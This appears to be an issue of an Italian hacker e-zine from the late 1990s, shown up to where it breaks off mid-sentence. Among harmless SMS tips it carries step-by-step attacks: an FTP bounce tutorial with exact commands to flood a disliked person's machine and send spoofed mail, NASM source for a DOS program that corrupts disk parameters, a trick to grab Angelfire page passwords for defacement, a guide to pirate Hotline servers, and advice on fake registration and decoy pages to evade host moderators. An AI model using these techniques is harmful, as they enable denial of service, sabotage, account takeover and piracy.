ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ NOTA DI N0bodY88 = questo articolo non parla propriamente di phreaking ma di cose interessanti sul mondo dei telefonini e sulle loro possibilita' infinte o quasi...ho deciso infatti di pubblicarlo in questa sezione xche' x diventare phreakers bisogna conoscere i telefoni e i cell e quindi...qui ci sono un po' di info ^__^ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ _-_-_-_-_-_-_-_-_-_-_-_-_-_-__ FORSE NON SAPEVATE CHE ... _ _ _ _-_-_-_-_-_-_-_-_-_-_-_-_-_-_- Una sera stando come al solito in rete sul canale #cybernet vidi apparire un topic che pubblicizzava un url che desto' grande fermento ed interesse nel canale. Vidi la gente che etichettava quest'url e il suo kontenuto kome "altamente lameh", vidi righe di testo ke denigravano il concetto di guida all'hackin' per newbies e wannabe vidi ankora gente che si permetteva di etikettare kome lamer gli stessi editori della rivista... Fui attratto da quell'url in cima alla finestra di cybernet che destava tanto scalpore.. Lo andai a visitare e ne scarikai il kontenuto. Ottenni infine un volume di pagine che si poneva l'obbiettivo di dare delucidazioni su tutto cio' ke koncerne il mondo dei computers e della rete. Lo stampai e lo lessi tutto pensando, alla fine, che rimaneva sempre un buon tentativo di dare elucubrazioni (!!!!:)) su tutto cio' ke riguarda il "nostro mondo". La dedussione fu semplice : questa puo' rimanere una rivista da lamers per tutti koloro ke konoscono a fondo l'utilizzo della rete ma sikuramente non lo sara' mai per koloro ke hanno ankora dei dubbi e ke vogliono imparare kualkosa senza stare ore e ore a tradurre pallosi testi teknici in inglese... (di roba italiana c'e' n'e' pokina...). Bah...kontinuero' a scarikare questa rivista ogni volta che trovero' un'altra nuova "issue" ...mi sembra ben fatta, sinceramente. (Complimenti.) Mhhhh....mi sa ke ho perso di vista l'argomento principale dell'artikolo... Va beh... rikomincio dal titolo: FORSE NON TUTTI SANNO KE... e' possibile avere informazioni su Finanza (servizi finanziari non la GdF!!!), meteorolgia, risultati ed estrazioni dei gioki, astrologia, bioritmi, servizi personali e ankora su Trasporti, Servizi Personali , E-mail , e Internet ...DIRETTAMENTE DAL VOSTRO CELLULARE!!!! Come?! Beh, adesso ve lo spiego :)) ----------|Parte Uno| ----------La prima cosa da fare e' verifikare se il vostro telefonino e' abilitato alla trasmissione degli SMS dal momento ke tutti i GsM sono in grado di inviarli ma non tutti sono in grado di riceverli. Se il vostro telefonino e' abilitato alla trasmissione di SmS, adesso dovete configurarlo. Sapete benissimo ke i menu' e le configurazioni variano da telefonino a telefonino quindi, questa e' la procedura, e vedete di cavarvela da soli.. [1] Trovate l'area MESSAGGI nel vostro cellu [2] Nelle impostazioni c'e' la voce CENTRO MESSAGGI al quale va attribuito il numero +393359609600 Adesso il vostro cellu e' abilitato all'invio degli SmS ----------|Parte Due| ----------Adesso non vi resta che andare nell'area di invio dei messaggi (SmS) e scrivere una delle parole chiave qui sotto elencate e poi inviare il tutto al numero 2002. Vi arrivera' dopo poki secondi uno skuillo che dovrebbe riportare (come messaggio) le info da voi richieste. :)) SERVIZI ECONOMIKO-FINANZIARI BORSE ---->Aggiornamento sugli indici di borsa azionari CAMBI ---->Informazioni sui cambi tra moneta e moneta FIN ------>Aggiornamento notiziari economiko finanziario de "Il sole 24 Ore" METALLI -->Quotazioni di oro e argento MIB ------>Aggiornamenti per tutti i titoli trattati dalla Borsa di Milano SERVIZI INFORMATIVI MARI --->Aggiornamenti e previsioni meteo per i mari italiani METEO -->Previsioni del tempo delle principali localita' italiane NEVE --->Info sull'altezza della neve nelle principali lokalita' sciistike italiane NEWS --->Ricezione dei notiziari ANSA (titoli principali) RISULTATI ED ESTRAZIONI CALCIO -->Risultati parziali e finali partite in schedina ed altre info ENALOTTO,LOTTO,TOTIP,SCHEDINA,TRIS,TOTOGOL-->colonne vincenti dei rispettivi giochi (Ho messo tutte le parole chiave insieme per evitare inutili ripetizioni e perdite di tempo) :)) [NATURALMENTE ogni parola E' una parola chiave...Non mi dite che avete scritto tutta la riga????] SERVIZI PERSONALI ASTRI-->Oroskopo del giorno (wow!) BIO---->Aggiornamento del proprio bioritmo giornaliero (scommetto ke non sapete cosa e' vero?) MEMO--->Consente di inviare al proprio telefonino un messaggio in tempo differito TRASPORTI AEREI,TRENI-->Orari ufficiali di partenza e arrivo (per i treni solo Eurostar e Intercity) SERVIZI PROFESSIONALI ANSA-->Come per NEWS dal quale differisce per il numero di notizie ricevibili con un unika rikiesta INTERNET (!!!:) E-MAIL-->Invio di E-Mail dal vostro cellu ----------------------------------MA KUANTO KOSTA????-------------------------Per gli abbonati il kosto e' di 195lire + iva per ogni SmS inviato dall'italia. Per le Carte rikarikabili il kosto e' di 200 lire (iva inklusa) per ogni Sms inviato dall'Italia. ------------------------------------------------------------------------------For more info's go to :http/www.scriptim.it Un saluto speciale a N0BodY88 che ha creduto in me per questo artikolo. -----------------------------UNA MIA DOMANDA--------------------------------Mi piacerebbe sapere se per caso c'e' in giro kualke programma che consenta di cambiare a piacimento le ikone di altri programmi... Una volta ho sentito di un programma che si kiamava "Mikelangelo98" mi pare... Altra domanda: Ho sentito in giro che esiste un modo per far accettare sempre e comunkue qualunkue file a kualnunkue utente... Ne sapete qualkosa? Per informazioni riguardo il mio artikolo, le mie domande, consigli e suggerimenti vari mandate una mail a [email protected] Un salutone a tutti i komponenti del NewBies Staff... ]Akuma[ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COSA C'E' DIETRO AI GREEN??? ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ I GRRENZ sono BELLISSIMI guardiamo il sistema che ci puo' stare dietro 167821090 4800 HPN Milan pad #5 inhouse p30. MOTOROLA SERVICE PRODUCTION enter 'h' or 'help' followed by a topic. possible topics are: xtypes x28cmds x3parms mnemonics profiles rpoa help sym = "31366600101*``sym" trace = "1000*``trace" als = "31360070001111\\31360050001111" geis = "31360070001111\\31360050001111" MKIII = "31367104106800\\31360254106800\\31360154106800" ppp = "p256,w2,31367112478701\\p256,w2,31360246478701" FMILN011 = "L" FFRNZ061 = "3136661906198" FMILN012 = "3136661901298" FPADU021 = "3136661902198" FBOLO041 = "3136661904198" FNPLI081 = "3136661908198" FGNOA051 = "3136661905198" FTURN031 = "3136661903198" FMILN013 = "3136661901398" FMILN014 = "3136661901498" FMILN015 = "3136661901598" FMILN016 = "3136661901698" FMILN019 = "3136661901998" FMISG091 = "3136661909198" FMADR011 = "3136770901198" press <cr> to c ADR012 = "3136770901298" FMADR013 = "3136770901398" FBARC021 = "3136770902198" FBARC022 = "3136770902298" FBILB031 = "3136770903198" FMILN017 = "3136661901798" FMILN018 = "3136661901898" FROME071 = "3136661907198" FROME072 = "3136661907298" secure = "p256,w2,31367112478703\\p256,w2,31360246478703" internal = "p256,w2,31360246874601\\p256,w2,31360256874601" = "" FBAHR131 = "31367121040132" available x3 and x28types are: pci c76 c80 micom dynapac telepac otc Countout. c84 amdahl dcall telenet telematics pacnet datapac hughes *h x28cmds Available commands are: call : retry previous clr : clear call copyclr: clear copy call copy h int npar reset rset stat type : : : : : : : : copy data call help send interrupt network parity reset circuit set remote x3 show status type string c : iclr : logoff : par : rpar : send : tactt : x28type: make call help send inv clear intd disconnect device menu display x3 prof show remote x3 rprof send data set channel test tact change x28type x3type : help : int & discard : disply menu : change profile : chg remote prof : set x3 : channel test : change x3type call request example: [c] a,r,t4,p128,w(3),d(9600,4800),s-12345*userdata examples of available facilities are: g12 = cug o12 = oacug r = rev fr = fastres t1234 = rpoa w3 = wsze d9600 = thruput s = reselection prevention f = fastsel p128 = psze a = accounting help *h x3parms 1 4 7 10 13 16 19 22 24 27 30 pad recall idle timer break action line folding lf insertion char delete editing signals page wait data forwarding 2 padding after tab xon char to pad 2 5 8 11 14 17 20 0 25 28 31 echo flow control dev discard output speed lf padding line del echo mask national marker output pending xon char to device xoff char to pad * ?logout=disconnette CALL CALL ? Cxx call parameters COPYA nn COPYH nn COPYC nn COPYI nn CLR HELP or ? HELP E or ? E INT KCOPY LOG PAR? parameter #1, parameter #2, ... PAR? PROF PROF [profile #] or [profile name] PROF ? RESET SET parameter #1:value, parameter #2:value, ... SET? parameter #1:value, parameter #2:value, ... STAT 3 6 9 12 15 18 21 23 26 29 32 forwarding char service signals cr padding flow control pad edit line display parity treatment data forwarding 1 interval timer xoff char to device forward char. count Call previous address Display previous address Call using specific port Copy input/output to port Copy output to port Redirect output to port Copy input/redirect output Clear a virtual circuit Display X.28 commands Display extended commands Send interrupt packet Terminate local copy Log out of X.28 Display X.3 parameters Display all X.3 parameters Display current profile Change to specified profile Display available profiles Send reset packet Set X.3 parameters Set/display X.3 parameters Display channel status bello no.... hihihi a me pare carino ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°°°°ÛÛÛÛ°°°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°² ²°°°°°°°°°ÛÛÛÛÛÛ°°°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ HOTLINES QUESTO SCONOSCIUTO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Salve, sono un utilizzatore di PC dal lontano 1978 e quindi penso di essere uno dei piu' anziani di questo gruppo di pazzi scatenati (intendo bonariamente!!! non prendetevela subito eheheh). Sin dal 1982 utilizzo computer della Apple ed anche oggi vi sto scrivendo con il mio bel Macintosh che ritengo ancora oggi il miglior compromesso fra hardware e software che si possa trovare in commercio a prezzi ragionevoli. Volevo parlarvi del circuito di Hotline in quanto ho visto che gli utilizzatori di wintel non lo conoscono. Vi chiederete, cosa e' Hotline? In poche parole e' un sistema di server e client, a cui ognuno puo' accedere con il programma chiamato appunto Hotline client. Cosa si trova su tale circuito? Praticamente di tutto, esistono i server di software huose ufficiali quali la Apple Inc., la Alladin ecc. e server cosiddetti pirati sui quali si trova di tutto, dai famosi mp3 (brani musicali) a programmi warez (software commerciali piratati), shareware, freeware, ai famosi crack e number (numeri di serie e crack per programmi commerciali e non che di solito siete abituati a reperire su astalavista) ed altro ancora. Dove posso reperire il programma Hotline client? Basta andare su www.hotlinesw.com e scaricarlo, per piattaforme wintel mi sembra che siamo arrivati alla versione beta7 mentre per Mac siamo alla versione 1.5 ed oggi esiste anche una preview di un altro client chiamato Carracho sviluppato da un ottimo programmatore italiano che da la possibilita' di poter accedere agli stessi server. Una volta scaricato il programma esso da la possibilita' di connettersi ad un server per 5 minuti fino a che non e' stato registrato, ma questo penso che non sia un problema per nessuno di Voi, altrimenti mi potrete scrivere e pensero' io a fornirvi il Vostro numero di serie personalizzato almeno non avrete piu' alcun limite di tempo. A questo punto dovrete andare nelle option e cambiare il tracker che viene proposto, salvare e chiudere il programma e quindi riaprirlo altrimenti la variazione non viene effettuata, in quanto con quello di serie vi vengono tracciati solo server commerciali o che offrono solo prodotti shareware o freeware e penso che Voi vogliate qualche cosa di piu'!!! Ebbene, andate su http://www.troutmask.com/#TRACKERS e qui potrete vedere quali sono i tracker attivi in quel momento e quindi scegliere quello che piu' vi aggrada e una volta che vi verranno visualizzati nella finestra "Trached Servers" i server attivi fare doppio click su quello che piu' vi piace, quindi premere il pulsante "Files" che vi aprira' una nuova finestra che vi fara' vedere il contenuto del server ed ora che siete dentro potete effettuare il download di quello che vi manca. Una cosa molto importante e' leggere le news di quel server premendo l'apposito pulsante, in quanto non tutti i server sono completamente free, ovvero in tanti vi e' una cartellina chiamata request e qui dentro vi sono i nomi dei programmi che l'amministratore del server vuole in cambio dell'account che vi concedera', fate l'upload di un programma richiesto e poi postategli il nome del programma che gli avete scaricato, il vostro nickname (anche questo modificabile nelle option), la userID che avete scelto e la password e vedrete che di norma entro 24/48 ore avrete pieno accesso ad effettuare il download dei programmi che vi interessano. Vi sono anche server che vi indirizzeranno su delle pagine www e qui vi chiederanno di premere un banner che vi portera' ad un altro sito (di solito pornografico) e la xx parola sara' la vostra userID e quindi sempre dal sito iniziale premere un altro banner che vi portera' ad un altro la cui xx parola sara' la vostra password e cosi' potrete entrare nel server e quindi effettuare il download dei programmi in esso contenuti; di solito in questi casi la userID e la password cambiano tutte le settimane. Spero di essere stato abbastanza chiaro e comunque resto a Vostra completa disposizione per ogni chiarimento, scrivetemi su [email protected]. Nemesis ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ FTP BOUNCE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Salve a tutti probabilmente conoscete gia la tecnica dell ftp bounce Tuttavia ho pensato di scrivere questo breve articolo per coloro che non hanno mai usato questo sistema. dunque quello che vi serve e' un server ftp un po vecchiotto provate quindi nelle varie universita (non quelle italiane mi raccomando) bbs siti ftp di provider locali ,dopo aver immesso user a pass provate a scrivere "quote port x,x,x,x,0,25" dove la x spero lo abbiate capito da voi sarebbe l'ip del computer vittima e il numero 25 equivale alla porta del computer vittima in questo caso la smtp. se vi risponde QUOTE PORT COMMAND SUCCESFUL; siete a posto ora potete usare questo server per dirottare la connessione su di un altro computer :))) un esempio di quello che si puo fare con questa tecnica potrebbe essere mandare in crash un utente in irc provando a mandargli un file di grandi dimensioni (ovviamente dovreste prima fargli uno scanner delle porte aperte per vedere dove dirottare il file) ESEMPIO: ce' un tizio con ip 178.166.45.34 che non vi va a genio cosa fare? per prima cosa fate partire un port scanner e individuate le porte aperte,supponiamo che troviamo la 139 aperta dunque ora andremo nel nostro sito ftp base con ip 123.75.223.8. e scriviamo User:ftp pass:[email protected] guest login ok . andiamo nella directory dove ci sono file molto grandi cd /pub facciamo un bel dir per vedere i file ne scegliamo uno molto grande e ora dirottiamo la connessione quote port 178,166,45,34,0,139 quote retr nomefilegrande fatto il server mandandera' il regalino alla vostra vittima col suo ip :)) questo e' un esempio di quello che si puo fare naturalmente ci sono altre tecniche dell ftp bounce molto piu sofisticate tuttavia per farle bisogna poter uploadare i file e non tutti i server ti permettono di farlo e quelli che ti permettono l'upload magari sono senza bug comunque il sistema e' lo stesso e' sufficente crearsi un file di comandi uplodarlo al server base a da li ridirgerlo sul computer vittima. un file di comandi potrebbe essere tipo questo helo pippo.com mail from:[email protected] rcpt:[email protected] data anonimo . quit come avrete capito spero con questo file di comandi si possono mandare mail anonime oppure per irc si potrebbe creare un file di comandi per spooffarsi. e' tutto buon ftpbounce. Ghimlet ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ VIRUS X DOS 6.1 ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Allora il nostro mitico Vecna ci ha fatto avere un virus che non funzia sotto win nt o 95 ma solo sotto DOS 6.1. Mostriamo qua questo virus fatto da Sorrow solo x dare un esempio di come e' fatto un virus, e cmq sappiate che in questa sede ci tengo a dichiarare che i virus writer NON SONO FALLITI ma sono non buoni programmatori, ma ottimi programmatori, xche' solo cononoscendo bene un linguaggio si riesce a tirarne fuori il meglio x i propri programmi...tutto questo e' IMO e solo IMO dato che non so cosa ne pensino gli altri membri della crew. Accludo le "istruzioni dettate da Sorrow "siccome la storia e' importante l'ho messo in ordine in modo che venga compilato dal NASM ( nasm -f bin -o Interleave.com ) e l'ho commentato un pochino...". Quindi un grosso grazie a Vecna x averci procurato un altra chicca x la ezine e a Sorrow x il materiale offertoci ^__^ Leggete, cercate di capire, che questo e' lo scopo x cui lo mettiamo sulla ezine, e ricordate che...conoscenza e' potere! N0bodY88 ---------------------------------------------------------------------------------; Sorrow The Prince ; modify hd interleave for DOS 6.1 ; use NASM to compile ; educational purpose only ; *** you has not the permission to modify the source *** ; ; ; ; ; ; ; ; ; ; ; ; ; IT mode ON =8) sfrutta il DRIVE PARAMETER BLOC, una delle strutture non documentate del DOS, nel quale vengono memorizzate diverse informazioni su disk drive, hard disk e Cd rom : insomma su tutti i device che abbiamo 8) ci sono deu funzioni per accedere ai vari DPB che sono 0x1F e 0x32 entrambe ritornano in DS:BX un ptr al DPB 0x1F ritorna il DPB del disk drive corrente, mentre con al funzione 0x32 possiamo scegliere il device mettend in DL 0 (A), 1 (B), 2 (C) etc... ho commentato solo la parte "interessante" del programmino, il resto si limiuta a scrivere se abbiamo modificato o no l'interleave non funziona sotto Win95 e WinNT : la chiamata va a buon fine ma l'interleave non viene modificato ; ; ; ; NOTE FINALI il risultato e' molto carino a vedersi sotto DOS : tutti i comandi del command funzionano a dovere, ma non e' possibile lanciare alcun eseguibile perche' non viene letteralmente trovato carino, veloce e semplice! BITS 16 ORG 0x100 SECTION .text jmp main main mov mov int jc mov mov mov mov jmp ah,32h ;numero fne in ah dl,03h ;3 = drive C, l'HD -8) 21h error ; se e' avvenuto errore scriviamo qlc al,01h ; altrimenti settiamo a 1 [ds:bx+4],al ; l'interleave del disco fisso che di ax,cs ; solito e' maggiore ds,ax ok error mov mov lea int jmp mov ax,cs ds,ax ax,0900h dx,[msge] 21h fine ok mov mov lea int mov ax,cs ds,ax ax,0900h dx,[msg] 21h fine : mov int 21h ax,4C00h SECTION .data msg db "Finishing... OK!$" msge db "!!!ErroR!!!$" _.._ _.._ ,','"_:./\/\,'_ `.`. Sorrow The Prince /_:--:_ ( oo ) _:--:_\ uin( ******** ) - GiR 239 /' `'`vv'`' `\ Member of cOc ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ QUALCHE INFO SU ANGELFIRE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Allora, di recente ho trovato un txt sull'hacking di Angelfire e, oltre a sconsigliare il social engineering (funzionante soprattutto x geocities) conteneva questa informazione..... quando fai un login x modificare la pagina web vine aperto un file che si chiama BEDIT.HTML cosi' composto: <font color=teal>Your page <a href="http://www.angelfire.com/ak2/r00t7/ index.html"> http://www.angelfire.com/mi/KrazieBread/index.html </a> has been saved.<br>You may have to click Reload or Super-Reload (Shift+Reload) to see your edited page and not your old version when you go to your URL. <br>You can also announce your new page on <a href="http://homepages. whowhere.com/bin/showpage.pl?add">WhoWhere?</a>, <a href="http://newtoo. manifest.com/"><u>What's New Too!</u></a>, or if you really want to get noticed, go to <a href="http://www.submit-it.com/"><u>Submit It!</u></a> <br>Tune up your Web Site at the <a href="http://www.angelfire.com/cgi-bin/ ct?ad=websitegarage&vp=/index.clicked&ru=http://www.websitegarage.com/ whowhere">Web Site Garage</a>.</font> </td></tr></table></center> <form select method="post" action="http://www.angelfire.com/cgi-bin/bedit"> <input type="hidden" name="storage" value="mi"> <input type="hidden" name="hpd" value="r00t"> <input type="hidden" name="password" value="r00t7"> <-------PASSWORD!!! quindi se volete fare casino su una pagina di Angelfire cercate questo bel file (il social engineering funziona sempre) Byezzzzz SkHammer ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COME MANTENERE LA VOSTRA PAGINA "ILLEGALE" ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Created by: Biavo INTRODUZIONE: La cosa che si fa piu' spesso quando si naviga su Internet e' cercare un bel sito pieno di consigli su azioni piu' o meno legali riguardanti l'hacking, il cracking, il phreaking e chi piu' ne ha piu' ne metta. Ovviamente questi siti sono sempre ben nascosti e raramente si trovano su server che forniscono spazio web gratuitamente come GeoCities, Tripod e compagnia bella. Infatti, questi server hanno una serie di rigide regole da rispettare se non si vuole vedere il proprio sito cancellato, quindi sembrerebbe che per gli hacker privi di "mezzi" non ci sia molto da fare per non parlare di coloro che vogliono aprire il loro sito di warez o di crackz (dato l'esiguo spazio che questi server concedono sarebbe in ogni modo un'impresa ardua!!!) e invece no! Come avrete capito se tentate di mettere su il vostro sito "illegale" presso uno qualsiasi di questi "benefattori", aspettatevi di vederlo cancellato nell'arco di poche settimane con la scusa del "contenuto improprio". Qualcuno, se non lo avete capito, sta cercando di limitare la vostra liberta' d'espressione, e questa volta statene certi LUI NON LA FARA' FRANCA!!! PRIMA DI PARTIRE: Allora avete deciso di creare la vostra pagina con contenuto illegale? Benissimo, ne sono felice, per prima cosa ricordatevi di procurarvi un account di posta elettronica diverso da quello del vostro ISP, questo dovrebbe essere abbastanza semplice grazie ai vari Hotmail, Netaddress, Juno, Mailexcite, Bigfoot e l'italianissimo Freemail. Volendo potreste optare per un mail forwarder (ad es. Netforward), ossia un servizio che si limita a rispedire la posta al vostro vero indirizzo di Email. Io suggerisco di procurarvi un account che vi consenta di ricevere e spedire la posta (magari tramite browser) ed evitare quindi un forward dato che si puo' facilmente risalire al vostro vero ISP, inoltre scegliendo un account "completo" eviterete il rischio di Spam e noiose pubblicita' che invadono la vostra casella postale. Adesso siete pronti per crearvi l'account per le vostre pagine, come gia' detto GeoCities e Tripod sono i principali fornitori di questo servizio ma non gli unici, ricordatevi di consultare la lista "della spesa" alla fine di questo documento. ISCRIZIONE: Al momento dell'iscrizione per usufruire del servizio, vi saranno richiesti dei dati anagrafici, NON usate mai i vostri veri dati!!! Inventatevi nomi e indirizzi falsi ma non troppo, non bisogna mai creare sospetto. Se vi dovesse essere richiesto di inserire qualche riga per descrivere il contenuto delle vostre pagine NON inserite parole come hacking o altre che loro potrebbero trovare offensive verso i termini del contratto; piuttosto scrivete cose come: "Mario Homepage" o simile. Ricordatevi di fornire anche il vostro nuovo indirizzo Email che vi siete creati poco prima. CREAZIONE DELLE PAGINE: Dopo che vi siete iscritti, controllate la posta. Dovreste ricevere un messaggio di conferma della vostra registrazione inoltre vi sara' ricordato il vostro login/password (mi raccomando non perdeteli!!!). Ora siete pronti per collegarvi e lavorare sulla vostra homepage. USATE PAGINE "FASULLE": Questo e' il segreto per mantenere le vostre pagine in eterno creare due set di pagine!!! Perché due set di pagine? E' molto semplice. GeoCities nomina dei moderatori (chiamati "block leaders") per visitare siti all'interno dello spazio a loro assegnato. La cosa piu' bella moderatori non hanno accesso alla vostra password o alla vostra directory di (o quasi). Dovrete Dovete sapere che in modo casuale i e' che questi root percio' loro possono vedere solo quello che VOI decidete di fargli vedere. Ricordate nel contratto che avete accettato era presente una riga simile a questa: "no hidden or password protected pages are permitted" ("non sono consentite pagine nascoste o protette da password")? Bene, il motivo di questa limitazione sta proprio nel fatto che i moderatori non riescono a controllare pagine che non siano raggiungibili tramite i link presenti nell'Indice. Quindi abbiamo bisogno di due set di pagine. Un set conterra' tutte le pagine "improprie" mentre l'altro set conterra' delle stronzate sul vostro cane, la vostra famiglia e amenita' varie. Ora per avere il secondo set di pagine (quelle fasulle) avete due opzioni, o le create voi stessi o se siete pigri potete rubarle a qualcun altro. Se per esempio avete bisogno di un falso set di pagine per Tripod, potete fare una ricerca (con HotBot) sulla stringa "personal homepage". Sicuramente otterrete centinaia di link poiché al giorno d'oggi chiunque si crea la propria homepage! Comunque scegliete la vostra 